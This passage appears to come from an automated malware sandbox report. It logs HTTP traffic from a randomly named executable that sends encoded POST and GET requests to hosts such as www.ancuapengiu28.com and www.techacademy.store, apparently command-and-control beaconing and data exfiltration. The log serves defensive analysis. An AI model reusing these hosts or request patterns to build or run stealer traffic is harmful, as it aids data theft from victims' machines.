                          Data Raw: 7a 52 55 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 73 66 61 33 72 70 61 4d 74 49 41 31 59 6e 33 6a 66 33 46 33 71 32 4e 36 2b 6f 59 49 4b 52 62 61 73 30 48 47 57 54 62 46 79 79 66 54 4c 63 44 48 55 4a 74 77 48 65 36 30 72 63 6d 70 6f 39 56 33 4b 75 36 36 58 54 34 6c 39 55 4a 4a 7a 6a 33 6c 54 75 30 57 6e 59 50 78 70 4d 61 4d 7a 35 37 47 68 4e 38 46 76 45 38 52 31 57 37 54 58 78 55 68 67 50 4c 55 51 38 39 53 44 6a 62 41 34 41 42 2f 70 57 77 32 47 46 43 36 52 59 2f 72 74 32 55 7a 7a 6c 4d 44 33 31 35 43 56 42 58 55 6a 35 39 50 73 45 6c 57 77 2f 55 39 6f 59 6f 53 4e 39 53 39 58 4d 56 43 66 6b 4c 6a 55 39 75 50 5a 71 77 66
                          Data Ascii: zRU=NBnw/TZ1lQBPsfa3rpaMtIA1Yn3jf3F3q2N6+oYIKRbas0HGWTbFyyfTLcDHUJtwHe60rcmpo9V3Ku66XT4l9UJJzj3lTu0WnYPxpMaMz57GhN8FvE8R1W7TXxUhgPLUQ89SDjbA4AB/pWw2GFC6RY/rt2UzzlMD315CVBXUj59PsElWw/U9oYoSN9S9XMVCfkLjU9uPZqwf
                          Jul 18, 2024 07:58:19.095880032 CEST1033INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 796
                          date: Thu, 18 Jul 2024 05:58:18 GMT
                          server: LiteSpeed
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.649729172.96.191.69805956C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 07:58:20.857610941 CEST726OUTPOST /d3vb/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ancuapengiu28.com
                          Origin: http://www.ancuapengiu28.com
                          Referer: http://www.ancuapengiu28.com/d3vb/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 232
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 74 2f 4b 33 74 4f 4f 4d 72 6f 41 32 57 48 33 6a 49 6e 46 4e 71 32 4a 36 2b 70 4d 59 4b 6a 2f 61 73 56 33 47 56 57 76 46 7a 79 66 54 41 38 44 47 61 70 74 76 48 65 48 42 72 64 61 70 6f 39 70 33 4b 75 4b 36 58 69 34 36 2f 45 4a 50 6f 7a 33 6a 58 75 30 57 6e 59 50 78 70 4e 2f 45 7a 34 54 47 6d 39 73 46 76 6c 38 51 72 47 37 51 66 52 55 68 33 66 4c 51 51 38 39 67 44 69 32 49 34 47 46 2f 70 58 41 32 43 48 71 35 65 59 2f 79 6e 57 56 68 2b 55 31 37 34 32 55 57 53 77 4f 7a 34 4a 68 75 6b 53 6b 4d 73 4d 55 65 36 49 49 51 4e 2f 4b 50 58 73 56 6f 64 6b 7a 6a 47 71 69 6f 57 65 56 38 2b 73 58 65 52 61 68 4a 45 7a 6a 45 4d 63 54 6c 30 6b 53 59 4f 51 3d 3d
                          Data Ascii: zRU=NBnw/TZ1lQBPt/K3tOOMroA2WH3jInFNq2J6+pMYKj/asV3GVWvFzyfTA8DGaptvHeHBrdapo9p3KuK6Xi46/EJPoz3jXu0WnYPxpN/Ez4TGm9sFvl8QrG7QfRUh3fLQQ89gDi2I4GF/pXA2CHq5eY/ynWVh+U1742UWSwOz4JhukSkMsMUe6IIQN/KPXsVodkzjGqioWeV8+sXeRahJEzjEMcTl0kSYOQ==
                          Jul 18, 2024 07:58:21.769669056 CEST1033INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 796
                          date: Thu, 18 Jul 2024 05:58:21 GMT
                          server: LiteSpeed
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.649730172.96.191.69805956C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 07:58:23.449057102 CEST1739OUTPOST /d3vb/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.ancuapengiu28.com
                          Origin: http://www.ancuapengiu28.com
                          Referer: http://www.ancuapengiu28.com/d3vb/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 1244
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 4e 42 6e 77 2f 54 5a 31 6c 51 42 50 74 2f 4b 33 74 4f 4f 4d 72 6f 41 32 57 48 33 6a 49 6e 46 4e 71 32 4a 36 2b 70 4d 59 4b 6a 33 61 74 6a 6a 47 57 78 7a 46 77 79 66 54 4e 63 44 44 61 70 73 7a 48 65 66 46 72 64 57 54 6f 37 74 33 4b 50 71 36 52 51 51 36 32 45 4a 50 68 54 33 6d 54 75 30 50 6e 59 66 39 70 4d 50 45 7a 34 54 47 6d 37 51 46 6d 55 38 51 73 32 37 54 58 78 55 6c 67 50 4c 34 51 38 6c 4b 44 69 44 71 34 32 6c 2f 73 48 51 32 41 54 4b 35 54 59 2f 77 67 57 55 6b 2b 56 4a 6b 34 32 49 61 53 77 72 57 34 49 5a 75 30 44 5a 67 33 50 6b 78 75 34 6f 6f 64 39 61 6f 54 62 56 57 53 6b 6a 38 43 37 79 56 50 4b 4e 6f 7a 71 54 33 46 6f 56 4d 46 78 66 72 4c 64 53 72 38 55 57 51 53 47 72 61 66 31 6b 33 30 49 54 41 37 79 54 34 52 2b 2b 49 48 2b 76 50 50 4b 52 63 34 45 69 4e 4b 42 55 4d 70 77 55 4d 6b 77 2f 44 49 58 53 36 74 2f 65 55 75 57 50 59 59 4f 78 39 7a 54 53 62 59 46 76 33 57 4a 75 55 48 50 6d 6b 4f 44 4e 4a 61 6c 33 55 54 2f 4b 69 6e 55 69 7a 7a 70 65 34 54 74 63 41 74 4d 48 67 38 35 50 68 59 37 [TRUNCATED]
                          Data Ascii: zRU=NBnw/TZ1lQBPt/K3tOOMroA2WH3jInFNq2J6+pMYKj3atjjGWxzFwyfTNcDDapszHefFrdWTo7t3KPq6RQQ62EJPhT3mTu0PnYf9pMPEz4TGm7QFmU8Qs27TXxUlgPL4Q8lKDiDq42l/sHQ2ATK5TY/wgWUk+VJk42IaSwrW4IZu0DZg3Pkxu4ood9aoTbVWSkj8C7yVPKNozqT3FoVMFxfrLdSr8UWQSGraf1k30ITA7yT4R++IH+vPPKRc4EiNKBUMpwUMkw/DIXS6t/eUuWPYYOx9zTSbYFv3WJuUHPmkODNJal3UT/KinUizzpe4TtcAtMHg85PhY7kf/BFG6zhyJnDsRYPDYCzkmioJvLdB+BUzeHgu4WDgTcbmTWNO8Z62sAT5/H+XCEVakfy/hdDjQJBq8Rp3t/ri8iESEVUpspAJRYutV9zZzao+v82LQRiKmR79gZWOWaQgck4nEm5iMKd8NYrUxhtYDz5St4zLrePi9GG3FEvt+7JbmRdIwPpYuM3/8j/E/zpJEgvhaeaees+dxR4jNcmfmsiYFCBU4N6bGqeR5tDqLl8ItSxND+d7LxldngLjmGCfPeWAFrwkRhmIXu1E9bvixMxCootrOmxxNmMY7QCNaaJNSbZ8hY31OZKET3DhRBEe0Axan5h1g9a9CRN8WraCk4Zc1DEZUleNvHxwFuKO+k4D3SHW8gByzlmIGBtHBEnUGsuHF5DxdQ5g6223FeWaV15jGP2oABcIk1UjflTESyxOelZ1ntstbriDqGRj2CHpzA8q5mBqqORobs9TTyL3IjX8WA1qndG+y9tSKMpT4wxp6vkqof7KbO6r/sMQuQoEYL3OX+RWCQZ6GmMS0emtmFSi5McsGN5dI3GeqHT1LAy1iCSSmXqZZQ0oZxptXvX6ITVkaA0b8vyia0mBuoe/qBqVl1k2mW/nSBT7cyn4hJgWLy3I1YI9Gt6GMxPEtrDXHrZLHti/5EWAfyb+n5R7LqASyhCXvoBi [TRUNCATED]
                          Jul 18, 2024 07:58:24.374906063 CEST1033INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 796
                          date: Thu, 18 Jul 2024 05:58:24 GMT
                          server: LiteSpeed
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.649731172.96.191.69805956C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 07:58:26.022748947 CEST432OUTGET /d3vb/?zRU=ADPQ8lRoxSByg+mG86XNue8ofAjmBVNA7RwbiYYLDlrQv278ITvGwT6pBJPFcJ5Oe9Xpz76I5qFPHvmWTw5Y21ldoEnhDfgwrYz6sOCTt4XHqos0nmhmqCv1SSwJ5dTjY+t3Vmc=&hR1p0=vfrlb HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.ancuapengiu28.com
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Jul 18, 2024 07:58:26.973881006 CEST1033INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 796
                          date: Thu, 18 Jul 2024 05:58:26 GMT
                          server: LiteSpeed
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.64973213.248.169.48805956C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 07:58:32.085448027 CEST702OUTPOST /cf3x/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.techacademy.store
                          Origin: http://www.techacademy.store
                          Referer: http://www.techacademy.store/cf3x/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 208
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 53 6a 4d 30 70 49 43 4d 46 44 62 6a 4e 32 6b 41 61 46 6c 64 55 71 49 66 4f 44 73 47 67 4a 4e 64 78 5a 76 61 47 65 51 42 55 72 64 33 74 77 4d 34 49 42 70 47 53 69 39 4d 36 66 42 63 39 31 6d 61 59 74 6e 68 61 6c 53 4e 57 70 46 70 7a 5a 43 41 4c 79 41 56 55 54 77 4b 7a 4c 34 2b 4c 63 50 78 76 69 54 47 61 75 56 71 5a 61 6f 54 58 42 4e 4f 4c 6d 62 67 6b 70 44 49 34 30 46 65 77 38 52 77 45 6a 74 4a 35 62 67 69 44 32 61 52 35 2f 6a 54 78 37 42 78 4a 77 78 42 6b 58 77 59 39 57 6e 2b 63 39 65 31 4c 64 51 72 59 66 36 58 70 4c 7a 49 39 6c 76 2b 43 53 72 70 4a 34 6d 71 65 30 59 6e 44 4c 32 48 33 70 50 6a 37 67 6d 48
                          Data Ascii: zRU=SjM0pICMFDbjN2kAaFldUqIfODsGgJNdxZvaGeQBUrd3twM4IBpGSi9M6fBc91maYtnhalSNWpFpzZCALyAVUTwKzL4+LcPxviTGauVqZaoTXBNOLmbgkpDI40Few8RwEjtJ5bgiD2aR5/jTx7BxJwxBkXwY9Wn+c9e1LdQrYf6XpLzI9lv+CSrpJ4mqe0YnDL2H3pPj7gmH


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.64973313.248.169.48805956C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 07:58:34.660021067 CEST726OUTPOST /cf3x/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.techacademy.store
                          Origin: http://www.techacademy.store
                          Referer: http://www.techacademy.store/cf3x/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 232
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 53 6a 4d 30 70 49 43 4d 46 44 62 6a 43 33 55 41 62 6d 39 64 42 36 49 63 4e 44 73 47 72 70 4e 52 78 5a 6a 61 47 63 38 52 55 39 4e 33 71 52 38 34 5a 7a 42 47 56 69 39 4d 78 2f 42 64 77 56 6d 46 59 74 72 54 61 6b 2b 4e 57 70 52 70 7a 5a 53 41 4b 41 6f 55 55 44 77 4d 2b 72 34 34 50 63 50 78 76 69 54 47 61 75 52 54 5a 61 77 54 58 78 64 4f 4b 48 62 6a 34 5a 44 4c 37 30 46 65 37 63 52 72 45 6a 74 52 35 65 34 49 44 30 69 52 35 2b 54 54 77 6f 5a 32 51 41 78 48 71 33 78 39 36 6b 4f 4e 45 4d 36 32 42 4f 73 58 4f 4e 4b 71 73 39 79 53 68 57 76 64 51 43 4c 72 4a 36 2b 59 65 55 59 4e 42 4c 4f 48 6c 2b 44 45 30 55 44 6b 56 4b 64 34 4b 7a 38 41 30 52 54 4e 64 76 52 72 78 43 61 74 55 51 3d 3d
                          Data Ascii: zRU=SjM0pICMFDbjC3UAbm9dB6IcNDsGrpNRxZjaGc8RU9N3qR84ZzBGVi9Mx/BdwVmFYtrTak+NWpRpzZSAKAoUUDwM+r44PcPxviTGauRTZawTXxdOKHbj4ZDL70Fe7cRrEjtR5e4ID0iR5+TTwoZ2QAxHq3x96kONEM62BOsXONKqs9yShWvdQCLrJ6+YeUYNBLOHl+DE0UDkVKd4Kz8A0RTNdvRrxCatUQ==


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.64973413.248.169.48805956C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 07:58:37.243310928 CEST1739OUTPOST /cf3x/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.techacademy.store
                          Origin: http://www.techacademy.store
                          Referer: http://www.techacademy.store/cf3x/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 1244
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 53 6a 4d 30 70 49 43 4d 46 44 62 6a 43 33 55 41 62 6d 39 64 42 36 49 63 4e 44 73 47 72 70 4e 52 78 5a 6a 61 47 63 38 52 55 39 46 33 74 6e 49 34 4c 6c 4a 47 55 69 39 4d 38 66 42 59 77 56 6e 66 59 74 6a 74 61 6b 43 37 57 72 70 70 78 36 4b 41 62 42 6f 55 4e 7a 77 4d 33 4c 34 35 4c 63 4f 31 76 6d 33 43 61 75 42 54 5a 61 77 54 58 79 31 4f 4e 57 62 6a 72 4a 44 49 34 30 46 61 77 38 51 45 45 6c 46 42 35 65 30 79 44 46 43 52 2b 65 44 54 79 61 42 32 59 41 78 46 74 33 78 66 36 6b 53 53 45 4d 33 48 42 50 59 39 4f 4e 75 71 76 36 2f 59 78 55 6e 69 4f 42 2f 4c 4a 34 43 54 56 54 63 73 4a 37 79 6f 69 73 44 50 78 51 7a 34 57 2b 56 69 63 6a 31 6b 39 69 6e 52 46 34 30 47 37 78 6a 66 4d 70 70 4d 48 47 74 41 31 66 68 7a 56 79 34 2f 76 51 49 36 71 77 57 74 71 35 43 5a 74 4b 53 68 69 30 63 6e 2f 33 48 59 44 61 77 57 6d 78 78 68 7a 6b 67 6d 64 4a 43 6f 6d 7a 43 52 53 4d 38 73 42 6e 6d 4e 67 52 4a 61 2f 50 51 73 69 41 35 2b 37 43 43 68 65 32 32 77 69 46 52 71 38 39 2b 48 4b 72 68 56 76 6f 65 69 37 34 32 55 38 78 [TRUNCATED]
                          Data Ascii: zRU=SjM0pICMFDbjC3UAbm9dB6IcNDsGrpNRxZjaGc8RU9F3tnI4LlJGUi9M8fBYwVnfYtjtakC7Wrppx6KAbBoUNzwM3L45LcO1vm3CauBTZawTXy1ONWbjrJDI40Faw8QEElFB5e0yDFCR+eDTyaB2YAxFt3xf6kSSEM3HBPY9ONuqv6/YxUniOB/LJ4CTVTcsJ7yoisDPxQz4W+Vicj1k9inRF40G7xjfMppMHGtA1fhzVy4/vQI6qwWtq5CZtKShi0cn/3HYDawWmxxhzkgmdJComzCRSM8sBnmNgRJa/PQsiA5+7CChe22wiFRq89+HKrhVvoei742U8xwIJ3ZO2sNsgZdItcy4VHkk2oWaYeYWyCu2PRbDRxDNUOproytE+2SMJ3L0Vcv4jsN6skZBAu7smxwzkSoyeaaFrB0tIIdtUiKWW5864fHrqjbas86FZ5GEuLm/+V8DfnCVZB8IWrj+i4BBF8gCgo31iHlOdw2hP0GYZhddpV68UepjdJf6c0pnRiPDr1lD0o9xCON3u44wMdJB7t0EQsgVF5zH2/wzptCcoWlnK7k9Rg5eW3IluTmQpOCR248Q8N0EH05NckM4BOcoyr3UPfF5urowmy/oDPOeyBfI8+fdlTqyW9Rcu2s3pc0sW6077fdfsVJBLXdhfxvmfnOLlCCag1o6gc46gxKenWzeE5ObT6MW50DObwaUM8NFdGd0y01FrEwfR4rcSmncXqz2ebqlh4PDy7/eE6GZ9Y/TjFBl9X8VDtd729fUqMe8/eWRLOKhdYa3v68kVFw76h8LaQtgQjvbCm14C5Q5yZhtFwbq65dbEmH6WP8i/YCWm4gPBTZE9xl74DCC5hIms0w9SJBb5v9cJyidi0xl3hPETEz0cZYul9qNymVnZ2FOOnL9Q8bZ33kB68DQRBTFbDpc5ms9UEk7R96B/4Gi/7ia9FqSu05IW4zLPkoIAOWPEs80A3h6wsZNqx9TMNA6hQpYT+83aqlcgsZErJBw [TRUNCATED]


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.64973513.248.169.48805956C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          TimestampBytes transferredDirectionData
                          Jul 18, 2024 07:58:39.821866989 CEST432OUTGET /cf3x/?hR1p0=vfrlb&zRU=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI= HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.techacademy.store
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
